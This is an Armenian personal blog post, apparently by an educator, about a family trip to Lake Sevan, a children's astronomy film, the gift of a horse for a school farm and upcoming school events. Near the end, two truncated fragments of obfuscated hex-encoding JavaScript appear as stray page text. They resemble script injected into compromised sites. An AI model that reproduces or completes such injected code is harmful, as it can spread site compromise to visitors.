Դավիթ Բլեյանն «Աստղագիտություն մանուկների համար» հայերեն գիտահանրամատչելի ֆիլմը, քառասունյոթ րոպե տասնվեց  վայրկյան տևողությամբ, նայում է մեկ շնչով, ակնդետ… Սևանի «Ժայռ»-ից վերադառնալուց անմիջապես հետո` երեկոյան ժամը 7-8-ի արանքում. չես ընդմիջի, չես կտրի… Իսկ Սևանի ճանապարհին, Ստեփան հոպարի մեքենայի մեջ, լճի ափին, խաղալիս-լողալիս…
— Առաջին անգամ փակ տիեզերանավից բաց տիեզերք դուրս եկավ տիեզերագնաց Ալեքսեյ Լեոնովը…
— Պապա, ի՞նչ է նշանակում սև խոռոչ…
— Տեղ-տեղ օվկիանոսի խորությունը հասնում է մեկ-երկու կմ-ի… Հայրի՛կ, ի՞նչ է նշանակում սա… Դու կարո՞ղ ես ինձ կիլոմետրը ցույց տալ…
Ու մենք Սևանի ափին փորձում ենք ստանալ մեկ կմ երկարությամբ հատված…
— Հայրի՛կ, Սևանա լճի-ծովի խորությունը տեղ-տեղ քանի՞ կմ կկազմի… ցույց կտա՞ս…
Ես մտնում եմ ջուրը, ջուրն ինձ ծածկում է… խորը, խորը, մեկ կմ-ի հետևից… Այսպես ավելի հեշտ է. Դավթին իր հարցերով թողնում եմ Ստեփան հորեղբոր մոտ, որ չի լողում, «օ՜ֆ-օ՜ֆ»-ի վարպետ է… Խաղաղ օր անցկացրինք ընտանիքով-ուսուցչական մի խմբով «Ժայռ»-ում մեր… Ես տղայիս հետ բացեցի Սևանի, ինչպես երեկ Գեղարվեստում, ավազանային բացօթյա լողի շրջանը: Արևն ու սառը ջուրը, հեծանիվը, քայլքը, շարժունությունն իմ կենսականության-առողջության գրավականն են. իմ 2016-ի ծրագրերի ծավալն ու որակը բացառում են այլ վիճակ, քան մշտական մարզականը, անհոգնել ֆիզիկականը, տասնչորս-տասնվեց ժամ անընդհատ կրթահամալիրյան Բանգլադեշի երկրագործությունը… Իմ հաշվարկներում պատահականության-հաջողության գործոնը բացակայում է: Կա´մ ես, կա´մ դուք, սեբաստացի թե ոչ սեբաստացի` իմ երկրագործ ընկերները…

Ընտանեկան «Ժայռ»:
Լուսանկարները`Անահիտ Հարությունյանի:

Իմ հուշումով սեբաստացի հմայիչ զույգի՝ Մելինե-Մարիամ Մարտիրոսյանների տասնհինգամյակը նշեցինք «Այրուձի»-ում. շնորհակալ եմ իմ լավ բարեկամ Գագիկին՝ «Այրուձի»-ն ստեղծողին-ղեկավարին, սեփականատիրոջը… Նաև ընտանիքով մտերմացանք. Գագիկի կինը իմ հարսիկ Աննան, «Այրուձի»-ին ազնվություն հաղորդող տիրուհի է....«Այրուձին» է ստեղծել նրանց միությունը, այս միությունն է, որ պահում է հիմա «Այրուձի»-ն: Հալալ է:  Գագիկը մեզ, մեր սեբաստացի ագարակին նվիրեց երկու տարեկան մի թառլան ձի. աչքս չէի կտրում նրանից... Մնում է` անուն դնենք, ձիանոցն ավարտենք ու տեղափոխենք… Տպավորվեց ու մնաց Գագիկի գամփռ զույգը… Առանձնացել են, ու ինչպե՜ս է որձն էգին հսկում-խնամում… Երկու ամսից ծնվող քոթոթներից մեկը մերն է… Այսպիսի առատ շնորհներով կիրակի…

Տպավորիչ արշավային ցերեկ անցկացրինք. «Այրուձի»-ից Օհանավանք` իմ քույրիկներ Հովհաննիսյանների նստավայր, մեկ քայլ է… Սա էլ եթերաշրջանի բացում է… ինչպես «Այրուձի»-ի լողավազանում լողալը. ես ու Դավիթ Բլեյանը պայմանավորվել ենք` ոչ մի ջրային ավազան առանց մեզ, առանց մեր մուտքի-շնորհավորելու չթողնենք, լինի բնական թե արհեստական՝ գետ, լիճ, ծով, օվկիանոս, ամբարտակ-ջրամբար… Խոսքս, իհարկե, բաց ավազանների մասին է, ծածկածներն ինձ չեն հիացնում-հասնում… Կրթահամալիրի ծածկած լողավազանում երբևէ լողացած չկամ… Մի անգամ, փորձի կամ լողի հավաստագրի համար, երևի, կարելի է… Իսկ «Այրուձի»-ի բաց ավազանն ինձ ու Դավթին մեծ գոհունակություն պատճառեց… Տղան, իմ տղան չի կարող խիզախ չլինել ու… մեծահոգի-շռայլ-հասնող… Մնացածն ինքը գիտի… Իսկ Խորենը, Միքայելը և Գևորգը՝ երեք հուսալի-ուժեղ ընկեր մարզիկ սեբաստացիները, սկսել են բաց ավազանի կառուցումը՝ մեր սեբաստացիական ագարակում: Կիրակի ագարակի տղաների եռյակը հասավ Գեղարոտ… Այստեղից ՀՀ պաշտպանության նախարարության աջակցությամբ, այսօրվանից սկսած, կսկսենք տեղափոխել ավազը` ագարակի ու մանեժի համար… Միացե՛ք, ձեր մասնակցությո´ւնը բերեք, սեբաստացի-ոչ սեբաստացի, տարածաշրջանի ամենաուսումնական-մատչելի-հիգիենիկ-էսթետիկ ագարակ-ձիանոցի կառուցմանը…

5-6 տարեկանների հունիսյան ստուգատեսը:
Լուսանկարները` Անահիտ Հարությունյանի:

Ես ստանում, սիրով, հատ-հատ, օգուտով՝ ինձ ու ձեզ համար կարդում եմ 2015-16 ուստարվա նախաձեռնությունների մասին սեբաստացի աշխատողների նամակները: Շնորհակալ եմ վստահության համար, գրե՛ք, շատ էլ մի՛ ուշացրեք ու բարդացրեք… «…վազենք դեպի մեր միջև ամբողջական հաղորդությունը»…

Մարթան, Քնարիկը, Մարգարիտը, Զառան… Սուսոն, իհարկե, Անահիտը Մելքոնյան, Խորենը, Արմինե Թոփչյանը… Երկուշաբթիս իրենցով են արել-լցրել՝ գործերով… Ջա՜ն… Մի քիչ տեղ թողնեիք անձնական նախաձեռնությունների համար… Չնայած, ճիշտը սա է. ես ծառայություն եմ ղեկավարում-իրականացնում՝ սեբաստացի սովորող-ուսուցիչ-կազմակերպչի իրագործումներին կրթահամալիրային բարենպաստ միջավայրի ապահովման… Մեծացող սիրով-բարեխղճությամբ, հուսամ և շնորհքով…

Լարսի փակ լինելու պատճառով «Սեբաստացիներ» երգչախմբի շրջագայությունը Կովկասով հետաձգվում է. առաջիկա տասն օրերին ես կրթահամալիրյան Բանգլադեշում եմ: Համեցե՛ք:

Ո՞ր նախաձեռնությունը կառանձնանցեմ… այսօրվա, իհարկե, Արմինե Թոփչյանի, Սյուզիի, Կարինե Մացակյանի ու Բանգլադեշյան պլեների հունիսյան բոլոր ուսումնական նախագծերի ղեկավարների ցանկությունը՝ պլեներյան օրով Անգլիական այգում ամփոփելու-մեծարելու մեր ամենասեբաստացիական հունիսյան աշխույժը: Ոչ միայն ընտանիքով-ընկերներով կհանդիպենք հունիսի 28-ին երեկոյան Անգլիական այգում, այլև լավագույնս պատրաստվենք, որ իրիկնային երկժամը դառնա տպավորիչ ստեղծագործություն… Ասված է՝ մոբիլ ու ստեղծական:

Քոլեջի պստիկներն ու լողավազանը:
Լուսանկարները` Սոնա Աբրահամյանի:

# 714

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Թողնել պատասխան

Ձեր էլ-փոստի հասցեն չի հրապարակվելու։ Պարտադիր դաշտերը նշված են *-ով

Explore More

Սուսան Հովհաննիսյանի ծննդյան օրը

Ես առայժմ երաժշտությունն եմ լսում. Մոցարտն ինձ վեր է տանում աշխարհիկ կյանքից… Երբ Մոցարտ է հնչում, կիրակի է. հոգվույս տոն… Ես տեսանյութը առանց երաժշտության փորձեմ նայել… Իմ բլոգի շաբաթ օրվա գիրը,

Բայց այնպես չէ, որ ամեն ինչ կորած է…

Երբ լրագրողը՝ ծանոթ-անծանոթ, հատկապես ինտերնետային-անկախ-ինքնորոշված հեռարձակման, բարեկիրթ-խելացի-հետևողական է լինում, ես նահանջում եմ, ինչպես երեկ, ու երեկոյան 8-ին հայտնվում, այ, այսպիսի եթերում… Ես չգիտեմ-չեմ ուզում իմանալ՝ ինչի մասին կխոսենք-եթերում, միայն չմոնտաժեն-չխմբագրեն,

Պատմե՞մ, չպատմե՞մ…

Օրվա գրի հավելվածը Գիր է, պատմում եմ… Դավիթը Բլեյանը՝ այսքա՛ն հասուն, խոստումը քանի քայլով կատարեց, իմ ընկեր-սեբաստացի դարձած, իրեն լրիվ անծանոթ վարսավիր Իսրայելի մոտ եղավ ժամը 16։00, ոչ Ռուզան մորաքրոջ